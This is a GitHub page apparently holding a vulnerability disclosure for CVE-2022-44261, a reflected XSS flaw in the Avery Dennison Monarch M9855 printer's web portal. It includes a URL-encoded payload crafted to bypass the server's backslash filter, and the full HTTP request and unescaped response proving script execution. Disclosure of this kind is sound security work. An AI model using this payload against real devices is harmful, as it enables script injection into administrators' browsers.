-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathAveryDennison_MonarchM9855_XSS_CVE-2022-44261.txt
38 lines (26 loc) · 1.7 KB
/
AveryDennison_MonarchM9855_XSS_CVE-2022-44261.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
Reflected XSS (Cross-Site Scripting) attack - CVE-2022-44261
------------------------------------------------------------
Vendor: Avery Dennison
Print Model: Monarch M9855
Software Version: Monarch 7411 Print Adapter, Firmware Ver. CAMO-7.68 (2011.06.02), Boot Ver. 7.3
Type: Unauthenticated Remote attack
We have identified that the web portal of "Monarch M9855" printer device product is vulnerable to Reflective Cross-Site Scripting (XSS). This is due to that the Web App fails to adequately sanitize malicious strings. By leveraging this issue, an attacker is able to cause arbitrary HTML and JavaScript code to be executed in a user's browser within the security context of the affected site. This attack can be used in conjunction with a social engineering techniques.
We have managed to bypass the server-side protection since the back-end does not allow the "\" character. Also, the Space character should be URL encoded. Therefore, we crafted a URL encoded payload that didn't contain the "\" character.
Below, evidence is provided.
Request:
GET /%3Cimg%20src%3Dx%20onerror%3Dalert%28%22XSSbyIthacaLabs%22%29%3E HTTP/1.1
Host: 1.1.1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache
Response:
HTTP/1.0 200 Document follows
Server: XCD WebAdmin
Content-Type: text/html
<html><head><title> ERROR 404</title></head><body><center> FILE /<img src=x onerror=alert("XSSbyIthacaLabs")> NOT FOUND, ERROR 404</center></body></html>